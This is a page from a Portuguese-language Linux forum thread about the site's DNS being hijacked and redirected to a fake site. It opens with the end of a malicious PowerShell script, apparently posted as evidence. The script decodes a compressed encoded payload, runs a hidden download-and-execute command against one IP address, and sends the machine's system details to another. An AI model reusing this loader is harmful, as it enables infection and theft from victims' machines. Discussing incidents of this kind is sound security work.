FoAMABxAEcAYQB2ADEAWgBRAG0AYwBHAFAAVAB5AFQAcQBRAEcASQBCAE4AYwBjAGsAWABFAFMAUwBrADQAKwB4AGEARQB0AEgAMQAvAHYAUABmAGsAVwBVAEEATgBOAFYAQwBKAFcAUgBUAHQAVwBzAHIAMgBqADIAUAAxAGQARABlACsAaQBnAEsASQBrAGcARQBSAEIATAA0AHgASwBtAGkAUAByAFIAMQBQAFUAYQBEAHEAZABvAHoAZABvAGsAdQBmAFMAZwBYADMASwBkADEAZgB5AEIAdwBJAFAAeABjAEsARQBrAEgAWQArAHUARgBkAFkAWgBGAGQAVgBXADcAYwBVAEMAWAA3AFEATgA2AFIARwB2AHEANgBwAGcAYQBUAFoAeQBRAHEAUwBnADUASgBLAEgAWAAxAE4ANgA2AGkAegB4AEwAawBJAGEAUAB3AGsAaABxAEYAdABFAEMAZwBwAEIAcgBRAEUAbwBlAEkAUgB6AFcAYQBmAGcARgB1AGYATwBWAFEAcgAxAHUAeQBCADgAUgBPAHkAVgBwAEsAbQBKAG0AcwB0ADAAdwBvAEcAaABEADMAbABoAHcAYgBnADYATABxAGEAagB5AFQAcgBrAGEARgBxADEAbwBLAHgAaABuADMASQBlAE4ASABVAGEARgAyAFUAVQBQAFAAeQBGAEQAYwAxAEwAKwBvAEQAaQBEAEQAOABSAEoAUAA2AFUASgBiAHoAOAA4ADEANAB0AEkAUQBuAEIAYQBKAHIAbQB6AFEAcwBBAC8AVAByAEIAbgBXAEIASAB0ADAALwBJAFAAcQBhAGwAZwBkAEEAbAAwAEcAeQB1AHEASQBQAHAAegAyAGcAbAByAE8AaQAvAG4ANQBwAGoAZQA0AE8AMwBGAG8ASwBmAE8AaABsAFAASQBLAHkAaABUAE0AOABGAC8AeABGAFgAZwBNADQAQwBpADcASABKADcAYgBTADEAKwBHAEwAcQBLADgAMQAwACsALwBaAFoAbABFAGYAQwA5AGIAVQBsAFUAagBiADMAdAA0AEsAZwBaAE8AbQB6AEUASABsAHoAMwByAGsAcgB3AC8AbABBAFAAQgBjADcATwBOAGQAVQBlAGEAbQBiAEgAZABRAEcAeAAwAE8ASgBzAGIAWAAvADAAUQBQAHgAZgBYADgAWABWAHUAKwA1AGkAbgBqAGsAbgBnAEcAYgBTAHYASQBDAGwAKwAwADMAVQBOAFMAbAA3AHgAMQBDAGIAQgBIADEAaABxAHkAcABzADUAYgBSAEMAWAA3AHEAcwAwAGUAdQAxAFAALwBaAHgAYQBHAGoASgBDACsAeABRAC8AUQBjAG4ATgB2AEIALwBqAG0ANgBIAHcAUABWAFgATQBFAGMANwBlAEcAMABLADEANwB5AEEANgBzAEIAVwBPADQATgBQAFkAMwAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA
    
";
    
		}
    
		$durl = "http://130.211.157.13/artw/arquivo"
    
		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
    
		$tudo = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,67,73,77,86,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,42,32,70,82,79,77,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109) -join ''));
    
		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
    
	}
    
}
    
$mtx.ReleaseMutex()
    
$mtx.Dispose()
    
}


    2 0
  • Quote

    • 72. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Gabriel Henrique da Silva Ferreira
    MrBlackWolf
    (usa Arch Linux)

    Enviado em 25/11/2016 - 10:35h

    fernandojsouza escreveu:

    Ser comparado com Richard Matthew Stallman é uma honra ...


    Volto a diz não sabemos o real comprometimento do site se ação foi mais além (banco de dados) por isso sugiro a todos mudar as senhas do seu e-mail e do login aqui no site.

    Isso só o tempo dirá !!!


    Ontem o código fonte do site estava alterado hoje ate agora não vi mais essa alteração.Tenho o print da tela com o código alterado.

    O cache foi limpo e ate deletei a pasta .mozilla, mesmo assim o problema continuava ate o dia 23/11/2016.

    Vi o comentário do Fábio sobre a conta gmail usada como login no registro.br.


    Estou me baseando nos princípios do COBIT e também no nosso amigo Stallman.


    A intenção não foi de ofensa, não me entenda mal, mas Stallman nem sequer usa navegadores hoje em dia. Atualmente ele baixa o site usando ferramentas como wget.

    0 0
  • Quote


    • 01 02 03 04 05 06 07 08 09



    Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    Compartilhando a tela do Computador no Celular via Deskreen

    Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota

    Configuração para desligamento automatizado de Computadores em um Ambiente Comercial

    O mínimo que você precisa saber sobre o terminal (parte 2)

    O mínimo que você precisa saber sobre o terminal (parte 1)

    Dicas

    Como renomear arquivos de letras maiúsculas para minúsculas

    Imprimindo no formato livreto no Linux

    Vim - incrementando números em substituição

    Efeito "livro" em arquivos PDF

    Como resolver o erro no CUPS: Unable to get list of printer drivers

    Tópicos

    Não to conseguindo resolver este problemas ao instalar o playonelinux (1)

    Excluir banco de dados no xampp (1)

    phpmyadmin não abre no xampp (2)

    Ubuntu não sai som (0)

    KeepOS Não consigo usar o comando sudo. (4)

    Top 10 do mês

    Scripts

    [Python] Automação de scan de vulnerabilidades

    [Python] Script para analise de superficie de ataque

    [Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem

    [Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)

    [Shell Script] Script para adicionar bordas às imagens de uma pasta

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: